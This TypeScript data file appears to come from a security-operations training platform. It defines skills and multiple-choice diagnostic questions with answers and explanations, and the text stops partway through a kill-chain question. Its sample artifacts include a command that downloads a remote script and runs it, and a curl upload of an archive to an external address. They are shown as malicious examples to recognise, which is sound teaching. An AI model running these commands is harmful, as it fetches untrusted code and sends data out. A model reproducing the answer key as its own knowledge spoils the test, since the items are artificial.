/**
 * Capabilities and the probes that measure them.
 *
 * EVERY ARTIFACT BELOW IS REAL
 *
 * The log extracts, netstat tables, and process listings in these probes were
 * generated by running the actual commands against the actual simulated host,
 * not written by hand. That matters twice over: a learner who answers a probe
 * about `netstat -tlnp` output then runs the same command in the terminal sees
 * exactly what they were shown, and nobody can be marked wrong because the
 * example was subtly fictional.
 *
 * WHY MULTIPLE CHOICE RATHER THAN TERMINAL TASKS
 *
 * The baseline has to be takeable in about ten minutes by somebody who may not
 * yet know how to use a terminal at all. Asking them to *do* the thing would
 * measure the same gap twice and take an hour. Reading real output and saying
 * what it means is the cheapest honest signal available, and the exercises
 * themselves are where doing gets tested.
 *
 * A probe is wrong-answerable but not bluffable: every distractor is a mistake
 * somebody actually makes, not a filler option.
 */

import type { Capability, Probe } from '@soc/shared';

export const CAPABILITIES: Capability[] = [
  // --- Linux ---------------------------------------------------------------
  {
    id: 'cap-navigate',
    title: 'Move around a filesystem',
    summary: 'Know where you are, get somewhere else, and read a path correctly.',
    foundationId: 'linux',
    lanes: {
      'detection-engineering': 'supporting',
      'soc-ops': 'core',
      'incident-response': 'core',
      forensics: 'core',
      pentest: 'core',
      'security-engineering': 'core',
      'cloud-security': 'supporting',
      'red-team': 'core',
      appsec: 'supporting',
      'network-security': 'supporting',
      'vuln-management': 'supporting',
    },
    exerciseIds: ['1.1.1', '1.1.4', '1.1.6'],
  },
  {
    id: 'cap-read-large-files',
    title: 'Read a file too big to print',
    summary: 'Use head, tail, and paging instead of dumping 2,500 lines onto your screen.',
    foundationId: 'linux',
    lanes: {
      'detection-engineering': 'supporting',
      'soc-ops': 'core',
      'security-engineering': 'core',
      'incident-response': 'core',
      forensics: 'supporting',
      'network-security': 'supporting',
      'threat-intel': 'supporting',
    },
    exerciseIds: ['1.3.1', '1.3.3', '1.3.4'],
  },
  {
    id: 'cap-grep',
    title: 'Search text with grep',
    summary: 'Find the handful of lines that matter inside thousands, and count them.',
    foundationId: 'linux',
    lanes: {
      'detection-engineering': 'core',
      'soc-ops': 'core',
      'security-engineering': 'core',
      'incident-response': 'core',
      forensics: 'core',
      'threat-intel': 'supporting',
      'network-security': 'supporting',
      pentest: 'supporting',
      'vuln-management': 'supporting',
    },
    exerciseIds: ['1.4.1', '1.4.2', '1.4.3'],
  },
  {
    id: 'cap-pipes',
    title: 'Chain commands with pipes',
    summary: 'Feed one command into the next, which is how nearly all real log work is done.',
    foundationId: 'linux',
    lanes: {
      'detection-engineering': 'core',
      'soc-ops': 'core',
      'incident-response': 'core',
      forensics: 'supporting',
      'security-engineering': 'core',
      'network-security': 'supporting',
    },
    exerciseIds: ['1.4.5'],
  },
  {
    id: 'cap-permissions',
    title: 'Read file permissions',
    summary: 'Interpret an ls -l permission string, including the setuid bit.',
    foundationId: 'linux',
    lanes: {
      'soc-ops': 'supporting',
      'incident-response': 'core',
      forensics: 'core',
      pentest: 'core',
      'red-team': 'core',
      'security-engineering': 'core',
      'vuln-management': 'supporting',
      iam: 'supporting',
    },
    exerciseIds: ['1.1.3'],
  },

  // --- Log analysis --------------------------------------------------------
  {
    id: 'cap-log-format',
    title: 'Read a syslog-format line',
    summary: 'Break a log line into timestamp, host, process, and message without thinking about it.',
    foundationId: 'log-analysis',
    lanes: {
      'detection-engineering': 'core',
      'soc-ops': 'core',
      'security-engineering': 'core',
      'incident-response': 'core',
      forensics: 'core',
      'threat-intel': 'supporting',
      'network-security': 'supporting',
    },
    exerciseIds: ['2.1.1', '2.1.2'],
  },
  {
    id: 'cap-time-scope',
    title: 'Scope an investigation to a time window',
    summary: 'Narrow thousands of lines to the hour that matters.',
    foundationId: 'log-analysis',
    lanes: {
      'detection-engineering': 'core',
      'soc-ops': 'core',
      'security-engineering': 'supporting',
      'incident-response': 'core',
      forensics: 'core',
    },
    exerciseIds: ['2.1.3'],
  },
  {
    id: 'cap-signal-noise',
    title: 'Tell signal from noise',
    summary:
      'Judge whether a pattern of failures is an attack, a misconfiguration, or the internet being the internet.',
    foundationId: 'log-analysis',
    lanes: {
      'detection-engineering': 'core',
      'soc-ops': 'core',
      'security-engineering': 'core',
      'incident-response': 'core',
      'threat-intel': 'core',
      'vuln-management': 'supporting',
      'network-security': 'supporting',
    },
    exerciseIds: ['2.2.1', '2.2.2', '2.2.3'],
  },
  {
    id: 'cap-extract-fields',
    title: 'Extract fields from log text',
    summary: 'Pull addresses and labelled values out of unstructured lines and reduce them to a list.',
    foundationId: 'log-analysis',
    lanes: {
      'detection-engineering': 'core',
      'soc-ops': 'supporting',
      'security-engineering': 'core',
      'incident-response': 'core',
      'threat-intel': 'core',
      forensics: 'supporting',
    },
    exerciseIds: ['2.4.1', '2.4.2'],
  },
  {
    id: 'cap-correlate',
    title: 'Corroborate an event across two logs',
    summary: 'Confirm a finding in a second, independently written source before you report it.',
    foundationId: 'log-analysis',
    lanes: {
      'detection-engineering': 'core',
      'soc-ops': 'supporting',
      'incident-response': 'core',
      forensics: 'core',
      'threat-intel': 'supporting',
    },
    exerciseIds: ['2.4.4'],
  },

  // --- Regex ---------------------------------------------------------------
  {
    id: 'cap-regex-basics',
    title: 'Write a basic regular expression',
    summary: 'Describe a pattern precisely enough to match every instance and nothing else.',
    foundationId: 'regex',
    lanes: {
      'detection-engineering': 'core',
      'soc-ops': 'supporting',
      'security-engineering': 'core',
      'incident-response': 'supporting',
      'threat-intel': 'supporting',
      appsec: 'supporting',
    },
    exerciseIds: [],
  },

  // --- Networking ----------------------------------------------------------
  {
    id: 'cap-read-netstat',
    title: 'Read a netstat table',
    summary: 'Tell a listening service from an established connection, and local from remote.',
    foundationId: 'networking',
    lanes: {
      'soc-ops': 'core',
      'incident-response': 'core',
      'network-security': 'core',
      forensics: 'supporting',
      'security-engineering': 'core',
      pentest: 'supporting',
      'cloud-security': 'supporting',
    },
    exerciseIds: ['4.2.1', '4.2.2', '4.2.4'],
  },
  {
    id: 'cap-internal-external',
    title: 'Tell internal from external addresses',
    summary: 'Recognise private ranges, and know why a connection leaving the network matters more.',
    foundationId: 'networking',
    lanes: {
      'detection-engineering': 'supporting',
      'soc-ops': 'core',
      'incident-response': 'core',
      'network-security': 'core',
      'threat-intel': 'supporting',
      'cloud-security': 'supporting',
    },
    exerciseIds: ['4.1.1', '4.2.5', '4.2.6'],
  },
  {
    id: 'cap-ports-services',
    title: 'Know what common ports mean',
    summary: 'Recognise 22, 80, 443, 445, 3389 and what their presence implies.',
    foundationId: 'networking',
    lanes: {
      'soc-ops': 'core',
      'network-security': 'core',
      'vuln-management': 'core',
      pentest: 'core',
      'incident-response': 'supporting',
    },
    exerciseIds: ['4.2.2', '4.2.3'],
  },

  // --- Investigation tools -------------------------------------------------
  {
    id: 'cap-process-tree',
    title: 'Read a process listing',
    summary: 'Spot a process that has no business running, from the command column alone.',
    foundationId: 'investigation-tools',
    lanes: {
      'detection-engineering': 'supporting',
      'soc-ops': 'core',
      'incident-response': 'core',
      forensics: 'core',
      'security-engineering': 'supporting',
    },
    exerciseIds: [],
  },
  {
    id: 'cap-persistence',
    title: 'Recognise persistence',
    summary: 'Know the places an attacker hides something that survives a reboot.',
    foundationId: 'investigation-tools',
    lanes: {
      'detection-engineering': 'supporting',
      'soc-ops': 'supporting',
      'security-engineering': 'supporting',
      'incident-response': 'core',
      forensics: 'core',
      'red-team': 'core',
      pentest: 'supporting',
    },
    exerciseIds: [],
  },

  // --- Windows -------------------------------------------------------------
  {
    id: 'cap-windows-events',
    title: 'Read Windows security events',
    summary: 'Know what 4624, 4625, 4688 and 7045 mean, since most enterprise compromise is Windows.',
    foundationId: 'windows-events',
    lanes: {
      'detection-engineering': 'supporting',
      'soc-ops': 'core',
      'security-engineering': 'core',
      'incident-response': 'core',
      forensics: 'core',
      iam: 'supporting',
    },
    exerciseIds: [],
  },

  // --- SIEM ----------------------------------------------------------------
  {
    id: 'cap-detection-logic',
    title: 'Write detection logic',
    summary: 'Turn "an attacker does X" into a rule that fires on X and not on everything else.',
    foundationId: 'siem',
    lanes: {
      'detection-engineering': 'core',
      'soc-ops': 'supporting',
      'security-engineering': 'core',
      'threat-intel': 'supporting',
      'incident-response': 'supporting',
    },
    exerciseIds: [],
  },
  {
    id: 'cap-false-positives',
    title: 'Reason about false positives',
    summary: 'Judge whether a rule is worth its noise, which is most of what detection work is.',
    foundationId: 'siem',
    lanes: {
      'detection-engineering': 'core',
      'soc-ops': 'core',
      'security-engineering': 'core',
      'vuln-management': 'supporting',
    },
    exerciseIds: [],
  },

  // --- Incident concepts ---------------------------------------------------
  {
    id: 'cap-triage',
    title: 'Triage by severity',
    summary: 'Decide what to look at first when six things are on fire.',
    foundationId: 'incident-concepts',
    lanes: {
      'detection-engineering': 'supporting',
      'soc-ops': 'core',
      'incident-response': 'core',
      'vuln-management': 'core',
      'risk-compliance': 'supporting',
    },
    exerciseIds: [],
  },
  {
    id: 'cap-kill-chain',
    title: 'Follow a kill chain',
    summary: 'Put scattered events in order and name what stage of an intrusion each one is.',
    foundationId: 'incident-concepts',
    lanes: {
      'detection-engineering': 'core',
      'soc-ops': 'core',
      'security-engineering': 'supporting',
      'incident-response': 'core',
      forensics: 'core',
      'threat-intel': 'core',
      'red-team': 'supporting',
    },
    exerciseIds: [],
  },
  {
    id: 'cap-containment',
    title: 'Make a containment decision',
    summary: 'Know when to pull the plug and when pulling the plug destroys the evidence.',
    foundationId: 'incident-concepts',
    lanes: {
      'soc-ops': 'supporting',
      'incident-response': 'core',
      forensics: 'core',
      'security-engineering': 'supporting',
    },
    exerciseIds: [],
  },
  {
    id: 'cap-evidence',
    title: 'Preserve evidence',
    summary: 'Avoid the routine actions that quietly destroy what you needed to prove.',
    foundationId: 'incident-concepts',
    lanes: {
      'incident-response': 'core',
      forensics: 'core',
      'soc-ops': 'supporting',
      'risk-compliance': 'peripheral',
    },
    exerciseIds: [],
  },
];

// --- probes ------------------------------------------------------------------

const NETSTAT_LISTEN = `Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State        PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1198/sshd
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1422/nginx
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      1422/nginx
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      2204/gunicorn
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      1841/postgres`;

const NETSTAT_ESTAB = `Proto Recv-Q Send-Q Local Address           Foreign Address         State        PID/Program name
tcp        0      0 10.20.6.40:22           10.20.4.31:51882        ESTABLISHED 1198/sshd
tcp        0      0 127.0.0.1:5432          127.0.0.1:39004         ESTABLISHED 1841/postgres
tcp        0      0 10.20.6.40:443          10.20.4.58:60112        ESTABLISHED 1423/nginx
tcp        0      0 10.20.6.40:44218        198.51.100.60:443       ESTABLISHED 25904/curl`;

const PS_SUSPICIOUS = `USER         PID %CPU %MEM COMMAND
www-data    1423  0.4  0.3 nginx: worker process
postgres    1841  0.2  2.4 /usr/lib/postgresql/14/bin/postgres -D /var/lib/postgresql/14/main
sysmon     25702  0.0  0.0 /bin/sh -c curl -s https://198.51.100.60/b -o /tmp/.cache/u && bash /tmp/.cache/u
student    24880  0.0  0.1 -bash`;

const LS_PERMS = `-rwsr-xr-x  1 root     root         51500 Apr 17 11:50 /usr/bin/passwd
-rw-r-----  1 root     shadow         153 Aug 15 10:23 /etc/shadow
-rwxrwxrwx  1 sysmon   sysmon          48 Aug 15 11:15 /tmp/.cache/u`;

const AUTH_LINE = `Aug 15 10:14:22 rmg-web-02 sshd[25062]: Accepted password for testuser from 203.0.113.55 port 40460 ssh2`;

const AUTH_NOISE = `Aug 15 00:00:29 rmg-web-02 sshd[21426]: pam_unix(sshd:auth): authentication failure; rhost=10.20.9.40  user=nagios
Aug 15 00:05:19 rmg-web-02 sshd[21429]: pam_unix(sshd:auth): authentication failure; rhost=10.20.9.40  user=nagios
Aug 15 00:10:18 rmg-web-02 sshd[21438]: pam_unix(sshd:auth): authentication failure; rhost=10.20.9.40  user=nagios
Aug 15 00:15:22 rmg-web-02 sshd[21441]: pam_unix(sshd:auth): authentication failure; rhost=10.20.9.40  user=nagios
... 576 more identical failures from 10.20.9.40, every 5 minutes, all day`;

const AUTH_ACCEPTED = `Aug 15 07:38:14 rmg-web-02 sshd[23531]: Accepted password for jmartel from 10.20.4.31 port 51159 ssh2
Aug 15 07:49:07 rmg-web-02 sshd[23537]: Accepted password for dokafor from 10.20.4.58 port 51300 ssh2
Aug 15 10:14:22 rmg-web-02 sshd[25062]: Accepted password for testuser from 203.0.113.55 port 40460 ssh2
Aug 15 11:05:14 rmg-web-02 sshd[25064]: Accepted publickey for sysmon from 203.0.113.55 port 56524 ssh2`;

const KILL_CHAIN = `A. Aug 15 10:22:42  useradd[25340]: new user: name=sysmon, UID=1501
B. Aug 15 09:12:03  sshd: Failed password for invalid user ubuntu from 203.0.113.55
C. Aug 15 11:16:00  curl -s -T /tmp/.cache/pt.tar.gz https://198.51.100.60/u
D. Aug 15 10:14:22  sshd: Accepted password for testuser from 203.0.113.55
E. Aug 15 10:40:51  crontab[25455]: (sysmon) REPLACE (sysmon)`;

export const PROBES: Probe[] = [
  // --- cap-navigate --------------------------------------------------------
  {
    id: 'pr-nav-1',
    capabilityId: 'cap-navigate',
    prompt: 'You are in /var/log. You run `cd ..` and then `pwd`. What does pwd print?',
    options: [
      { id: 'a', label: '/var' },
      { id: 'b', label: '/var/log' },
      { id: 'c', label: '/home/student' },
      { id: 'd', label: '/' },
    ],
    answerId: 'a',
    explanation:
      '`..` means the parent directory, so you move up one level from /var/log to /var. `cd` with no argument would have taken you home instead.',
    level: 'recall',
  },

  // --- cap-read-large-files ------------------------------------------------
  {
    id: 'pr-read-1',
    capabilityId: 'cap-read-large-files',
    prompt:
      'auth.log has about 2,500 lines. You want the most recent entries, because an alert just fired. Which command?',
    options: [
      { id: 'a', label: 'cat /var/log/auth.log' },
      { id: 'b', label: 'head -n 20 /var/log/auth.log' },
      { id: 'c', label: 'tail -n 20 /var/log/auth.log' },
      { id: 'd', label: 'ls -l /var/log/auth.log' },
    ],
    answerId: 'c',
    explanation:
      'Logs are append-only, so the newest entries are at the END of the file. `tail` shows the end; `head` shows the beginning; `cat` dumps all 2,500 lines onto your screen.',
    level: 'recall',
  },

  // --- cap-grep ------------------------------------------------------------
  {
    id: 'pr-grep-1',
    capabilityId: 'cap-grep',
    prompt: 'You want the NUMBER of failed passwords in auth.log, not the lines themselves. Which works?',
    options: [
      { id: 'a', label: 'grep -c "Failed password" /var/log/auth.log' },
      { id: 'b', label: 'grep -n "Failed password" /var/log/auth.log' },
      { id: 'c', label: 'grep -i "Failed password" /var/log/auth.log' },
      { id: 'd', label: 'grep -v "Failed password" /var/log/auth.log' },
    ],
    answerId: 'a',
    explanation:
      '-c counts matching lines. -n adds line numbers, -i ignores case, and -v inverts the match so it shows everything that does NOT match.',
    level: 'apply',
  },
  {
    id: 'pr-grep-2',
    capabilityId: 'cap-grep',
    prompt: 'A log writes "ERROR", "Error", and "error" inconsistently. Which finds all three?',
    options: [
      { id: 'a', label: 'grep "error" file.log' },
      { id: 'b', label: 'grep -i "error" file.log' },
      { id: 'c', label: 'grep -c "error" file.log' },
      { id: 'd', label: 'grep -w "error" file.log' },
    ],
    answerId: 'b',
    explanation:
      '-i ignores case. This matters more than it sounds: different programs capitalise the same word differently, so a case-sensitive search silently misses most of them.',
    level: 'recall',
  },

  // --- cap-pipes -----------------------------------------------------------
  {
    id: 'pr-pipe-1',
    capabilityId: 'cap-pipes',
    prompt: 'What does `grep "sshd" /var/log/auth.log | wc -l` do?',
    options: [
      { id: 'a', label: 'Searches for the word "wc" inside sshd log entries' },
      { id: 'b', label: 'Counts how many lines mention sshd' },
      { id: 'c', label: 'Writes the sshd lines to a file called l' },
      { id: 'd', label: 'Shows the last line mentioning sshd' },
    ],
    answerId: 'b',
    explanation:
      'The pipe sends grep\'s output into `wc -l`, which counts lines. Chaining small tools this way is how almost all real log analysis is done.',
    level: 'apply',
  },

  // --- cap-permissions -----------------------------------------------------
  {
    id: 'pr-perm-1',
    capabilityId: 'cap-permissions',
    artifact: LS_PERMS,
    prompt: 'Which of these is world-writable — that is, ANY user on the system can modify it?',
    options: [
      { id: 'a', label: '/usr/bin/passwd' },
      { id: 'b', label: '/etc/shadow' },
      { id: 'c', label: '/tmp/.cache/u' },
      { id: 'd', label: 'None of them' },
    ],
    answerId: 'c',
    explanation:
      'Read the last three characters of the permission string — the "other" bits. /tmp/.cache/u is -rwxrwxrwx, so anyone can read, write, and execute it. /etc/shadow ends in --- and is readable only by root and the shadow group.',
    level: 'analyse',
  },
  {
    id: 'pr-perm-2',
    capabilityId: 'cap-permissions',
    artifact: LS_PERMS,
    prompt: 'The permission string for /usr/bin/passwd is -rwsr-xr-x. What does the "s" mean?',
    options: [
      { id: 'a', label: 'The file is shared between users' },
      { id: 'b', label: 'The file is a symbolic link' },
      { id: 'c', label: 'It runs with the privileges of its owner, not the person running it' },
      { id: 'd', label: 'The file is encrypted' },
    ],
    answerId: 'c',
    explanation:
      'That is the setuid bit. passwd needs it legitimately, because changing your password means writing to a root-owned file. A setuid binary somewhere unexpected is worth investigating — but finding one is the START of an investigation, not proof of anything.',
    level: 'analyse',
  },

  // --- cap-log-format ------------------------------------------------------
  {
    id: 'pr-fmt-1',
    capabilityId: 'cap-log-format',
    artifact: AUTH_LINE,
    prompt: 'In this line, which part is the process that reported the event?',
    options: [
      { id: 'a', label: 'rmg-web-02' },
      { id: 'b', label: 'sshd[25062]' },
      { id: 'c', label: 'testuser' },
      { id: 'd', label: 'Aug 15 10:14:22' },
    ],
    answerId: 'b',
    explanation:
      'Syslog format runs: timestamp, hostname, process[pid], then the message. rmg-web-02 is the host, sshd is the program, 25062 is its process id.',
    level: 'recall',
  },
  {
    id: 'pr-fmt-2',
    capabilityId: 'cap-log-format',
    artifact: AUTH_LINE,
    prompt: 'What actually happened here?',
    options: [
      { id: 'a', label: 'Someone failed to log in as testuser' },
      { id: 'b', label: 'Someone successfully logged in as testuser from an external address' },
      { id: 'c', label: 'The testuser account was created' },
      { id: 'd', label: 'testuser changed their password' },
    ],
    answerId: 'b',
    explanation:
      '"Accepted password" means the login succeeded. Note the source: 203.0.113.55 is not one of this company\'s internal 10.20.x.x addresses.',
    level: 'apply',
  },

  // --- cap-time-scope ------------------------------------------------------
  {
    id: 'pr-time-1',
    capabilityId: 'cap-time-scope',
    prompt: 'An alert says something happened at 10:37. Which command narrows auth.log to that hour?',
    options: [
      { id: 'a', label: 'grep "10:37" /var/log/auth.log' },
      { id: 'b', label: 'grep "Aug 15 10:" /var/log/auth.log' },
      { id: 'c', label: 'tail -n 10 /var/log/auth.log' },
      { id: 'd', label: 'grep "Aug 15" /var/log/auth.log' },
    ],
    answerId: 'b',
    explanation:
      'Because the timestamp sits at the front of every line, plain text matching filters by time. "Aug 15 10:" catches 10:00:00 through 10:59:59 — the surrounding context, which is what you want. Matching only "10:37" would miss what led up to it.',
    level: 'apply',
  },

  // --- cap-signal-noise ----------------------------------------------------
  {
    id: 'pr-noise-1',
    capabilityId: 'cap-signal-noise',
    artifact: AUTH_NOISE,
    prompt: 'Nearly 600 authentication failures from one address, all day. What is the MOST likely explanation?',
    options: [
      { id: 'a', label: 'A brute force attack that should be escalated immediately' },
      { id: 'b', label: 'A service account with a stale password, retrying on a schedule' },
      { id: 'c', label: 'A compromised internal host' },
      { id: 'd', label: 'Normal user behaviour' },
    ],
    answerId: 'b',
    explanation:
      'Three clues: the source is an INTERNAL address (10.20.9.40), the account name is a monitoring tool, and the interval is exactly five minutes all day. Attackers do not politely retry on a cron schedule. This is a misconfiguration — and it produces more failures than the actual attacker on this host does. Volume is not evidence.',
    level: 'analyse',
  },
  {
    id: 'pr-noise-2',
    capabilityId: 'cap-signal-noise',
    artifact: AUTH_ACCEPTED,
    prompt: 'These are successful logins. Which two deserve attention, and why?',
    options: [
      { id: 'a', label: 'jmartel and dokafor — they logged in earliest' },
      { id: 'b', label: 'testuser and sysmon — they came from an address outside the company network' },
      { id: 'c', label: 'None — a successful login is normal by definition' },
      { id: 'd', label: 'dokafor and testuser — they used passwords rather than keys' },
    ],
    answerId: 'b',
    explanation:
      'jmartel and dokafor come from 10.20.x.x, the internal office network. testuser and sysmon come from 203.0.113.55, which is external. Successes are quiet and rare; failures are loud and usually meaningless. Always read the successes.',
    level: 'analyse',
  },

  // --- cap-extract-fields --------------------------------------------------
  {
    id: 'pr-extract-1',
    capabilityId: 'cap-extract-fields',
    prompt:
      'You want a list of every DISTINCT IP address that appears in auth.log, one per line and no duplicates. Which pipeline?',
    options: [
      { id: 'a', label: 'grep -oE "[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" auth.log | sort -u' },
      { id: 'b', label: 'grep -E "[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" auth.log' },
      { id: 'c', label: 'grep -c "[0-9]" auth.log | sort' },
      { id: 'd', label: 'cat auth.log | sort -u' },
    ],
    answerId: 'a',
    explanation:
      'Two things are needed. -o prints only the matched text rather than the whole line, turning grep into an extraction tool. `sort -u` then collapses thousands of hits into the handful of distinct addresses behind them.',
    level: 'analyse',
  },

  // --- cap-correlate -------------------------------------------------------
  {
    id: 'pr-corr-1',
    capabilityId: 'cap-correlate',
    prompt:
      'You find one log line showing a suspicious login. Before reporting it, what is the most valuable next step?',
    options: [
      { id: 'a', label: 'Immediately isolate the server' },
      { id: 'b', label: 'Look for the same event in a second, independently written log' },
      { id: 'c', label: 'Delete the account' },
      { id: 'd', label: 'Search the same file for more of the same pattern' },
    ],
    answerId: 'b',
    explanation:
      'A single log line is a claim. The same event recorded by two different subsystems — sshd and systemd-logind, say — is evidence. It also catches tampering: if one source shows it and the other does not, that discrepancy is itself a finding.',
    level: 'analyse',
  },

  // --- cap-regex-basics ----------------------------------------------------
  {
    id: 'pr-regex-1',
    capabilityId: 'cap-regex-basics',
    prompt:
      'In a regular expression, what does [0-9]{1,3} match?',
    options: [
      { id: 'a', label: 'Exactly three digits' },
      { id: 'b', label: 'Between one and three digits' },
      { id: 'c', label: 'The literal text "0-9" repeated' },
      { id: 'd', label: 'Any three characters' },
    ],
    answerId: 'b',
    explanation:
      '[0-9] is a character class meaning "any one digit", and {1,3} means "one to three of the preceding thing". Together they match 1, 42, or 255 — which is why four of them joined by dots matches an IP address.',
    level: 'recall',
  },
  {
    id: 'pr-regex-2',
    capabilityId: 'cap-regex-basics',
    artifact: 'Pattern:  Failed password for (invalid user )?(\S+) from',
    prompt: 'Applied to a log line, what does the (invalid user )? part do?',
    options: [
      { id: 'a', label: 'Requires the words "invalid user" to be present' },
      { id: 'b', label: 'Excludes any line containing "invalid user"' },
      { id: 'c', label: 'Makes that phrase optional, so the pattern matches lines with or without it' },
      { id: 'd', label: 'Matches the phrase exactly once, at the start of the line' },
    ],
    answerId: 'c',
    explanation:
      'The ? makes the preceding group optional. sshd writes "Failed password for root" for real accounts and "Failed password for invalid user oracle" for ones that do not exist, so one pattern with an optional group catches both.',
    level: 'apply',
  },

  // --- cap-read-netstat ----------------------------------------------------
  {
    id: 'pr-net-1',
    capabilityId: 'cap-read-netstat',
    artifact: NETSTAT_LISTEN,
    prompt: 'Which of these services can be reached from ANOTHER machine on the network?',
    options: [
      { id: 'a', label: 'All of them' },
      { id: 'b', label: 'Only postgres and gunicorn' },
      { id: 'c', label: 'sshd and nginx' },
      { id: 'd', label: 'None — they are all LISTEN' },
    ],
    answerId: 'c',
    explanation:
      'Read the Local Address column. 0.0.0.0 means "every interface", so sshd and nginx accept connections from anywhere. 127.0.0.1 is loopback only — postgres and gunicorn can be reached from this host and nowhere else. That distinction is most of what a netstat table tells you.',
    level: 'analyse',
  },
  {
    id: 'pr-net-2',
    capabilityId: 'cap-read-netstat',
    artifact: NETSTAT_ESTAB,
    prompt: 'Which line would you investigate first?',
    options: [
      { id: 'a', label: 'The sshd connection from 10.20.4.31' },
      { id: 'b', label: 'The postgres connection from 127.0.0.1' },
      { id: 'c', label: 'The nginx connection from 10.20.4.58' },
      { id: 'd', label: 'The curl connection to 198.51.100.60' },
    ],
    answerId: 'd',
    explanation:
      'Three of these are internal (10.20.x.x) or loopback. The fourth is `curl` — a data transfer tool, not a service — holding an open connection OUT to an external address. A server making outbound connections it was never designed to make is one of the strongest signals available.',
    level: 'analyse',
  },

  // --- cap-internal-external -----------------------------------------------
  {
    id: 'pr-addr-1',
    capabilityId: 'cap-internal-external',
    prompt: 'Which of these is a private address that cannot be reached directly from the internet?',
    options: [
      { id: 'a', label: '203.0.113.55' },
      { id: 'b', label: '10.20.6.40' },
      { id: 'c', label: '198.51.100.60' },
      { id: 'd', label: '192.0.2.44' },
    ],
    answerId: 'b',
    explanation:
      '10.0.0.0/8 is private, along with 172.16.0.0/12 and 192.168.0.0/16. The others are public. Knowing instantly whether an address is inside or outside your network changes how you read every line of a log.',
    level: 'recall',
  },

  // --- cap-ports-services --------------------------------------------------
  {
    id: 'pr-port-1',
    capabilityId: 'cap-ports-services',
    prompt: 'A firewall log shows repeated blocked attempts to ports 445 and 3389 from the internet. What is being probed?',
    options: [
      { id: 'a', label: 'Web servers' },
      { id: 'b', label: 'Email servers' },
      { id: 'c', label: 'Windows file sharing and remote desktop' },
      { id: 'd', label: 'DNS servers' },
    ],
    answerId: 'c',
    explanation:
      '445 is SMB (Windows file sharing) and 3389 is RDP (remote desktop). Both are heavily scanned because both have had serious remote vulnerabilities. Seeing these blocked at the firewall is normal background noise, not an incident.',
    level: 'apply',
  },

  // --- cap-process-tree ----------------------------------------------------
  {
    id: 'pr-proc-1',
    capabilityId: 'cap-process-tree',
    artifact: PS_SUSPICIOUS,
    prompt: 'Which process would you investigate, and what is the giveaway?',
    options: [
      { id: 'a', label: 'nginx — web servers are often attacked' },
      { id: 'b', label: 'postgres — it is using the most memory' },
      { id: 'c', label: 'The sysmon process — it downloads a file from an external address and executes it' },
      { id: 'd', label: 'bash — interactive shells are suspicious' },
    ],
    answerId: 'c',
    explanation:
      'Read the command column. `curl ... -o /tmp/.cache/u && bash /tmp/.cache/u` downloads a file and immediately runs it — a textbook payload fetch. It writes to a hidden directory, and runs as an account most people would not recognise. High CPU or memory means nothing on its own.',
    level: 'analyse',
  },

  // --- cap-persistence -----------------------------------------------------
  {
    id: 'pr-persist-1',
    capabilityId: 'cap-persistence',
    prompt:
      'An attacker wants their access to survive a reboot. Which of these is the MOST common way on Linux?',
    options: [
      { id: 'a', label: 'Leaving a terminal window open' },
      { id: 'b', label: 'A cron job or systemd timer that re-establishes their connection' },
      { id: 'c', label: 'Changing the desktop wallpaper' },
      { id: 'd', label: 'Deleting the log files' },
    ],
    answerId: 'b',
    explanation:
      'Scheduled tasks are the classic. They run automatically, they look mundane in a process listing, and they survive reboots. Checking crontabs and systemd timers is a routine early step in any Linux investigation.',
    level: 'apply',
  },

  // --- cap-windows-events --------------------------------------------------
  {
    id: 'pr-win-1',
    capabilityId: 'cap-windows-events',
    prompt: 'In Windows security logs, what does event ID 4625 record?',
    options: [
      { id: 'a', label: 'A successful logon' },
      { id: 'b', label: 'A failed logon' },
      { id: 'c', label: 'A new process being created' },
      { id: 'd', label: 'A service being installed' },
    ],
    answerId: 'b',
    explanation:
      '4624 is a successful logon and 4625 is a failed one — the Windows equivalent of "Accepted password" and "Failed password". 4688 is process creation and 7045 is service installation, both of which matter a lot during an intrusion.',
    level: 'recall',
  },

  // --- cap-detection-logic -------------------------------------------------
  {
    id: 'pr-detect-1',
    capabilityId: 'cap-detection-logic',
    prompt:
      'You want to detect the payload fetch you saw earlier. Which rule is most likely to be USEFUL rather than merely correct?',
    options: [
      { id: 'a', label: 'Alert on any use of curl' },
      { id: 'b', label: 'Alert when curl writes to a path and a shell executes that same path shortly after' },
      { id: 'c', label: 'Alert on any process run by a user account' },
      { id: 'd', label: 'Alert on any outbound HTTPS connection' },
    ],
    answerId: 'b',
    explanation:
      'The first, third, and fourth are technically correct and operationally useless — curl and outbound HTTPS happen thousands of times a day. Good detection describes the BEHAVIOUR that is unusual, not the tool. A rule nobody can live with gets switched off, which protects nothing.',
    level: 'analyse',
  },

  // --- cap-false-positives -------------------------------------------------
  {
    id: 'pr-fp-1',
    capabilityId: 'cap-false-positives',
    prompt:
      'A rule fires 400 times a day. 399 are the same backup job. What is the right response?',
    options: [
      { id: 'a', label: 'Delete the rule — it clearly does not work' },
      { id: 'b', label: 'Leave it and tell analysts to work faster' },
      { id: 'c', label: 'Add an exclusion for that specific backup job, then keep the rule' },
      { id: 'd', label: 'Lower the severity so it stops appearing' },
    ],
    answerId: 'c',
    explanation:
      'Tuning means removing the KNOWN benign cause while keeping the detection. Deleting loses the coverage; lowering severity hides it without fixing it; telling people to work faster is how alert fatigue starts and how the 400th alert gets closed unread.',
    level: 'analyse',
  },

  // --- cap-triage ----------------------------------------------------------
  {
    id: 'pr-triage-1',
    capabilityId: 'cap-triage',
    prompt: 'Four alerts arrive at once. Which do you work first?',
    options: [
      { id: 'a', label: '2,000 blocked port scans from the internet' },
      { id: 'b', label: 'A successful admin login from a country the company does not operate in' },
      { id: 'c', label: 'A user failing their own password three times' },
      { id: 'd', label: 'An expired TLS certificate on an internal test server' },
    ],
    answerId: 'b',
    explanation:
      'Triage on consequence, not volume. Blocked scans are background noise. Three failed passwords is a Tuesday. An expired cert on a test box is a ticket. A SUCCESSFUL privileged login from somewhere impossible is potentially an active intrusion right now.',
    level: 'analyse',
  },

  // --- cap-kill-chain ------------------------------------------------------
  {
    id: 'pr-chain-1',
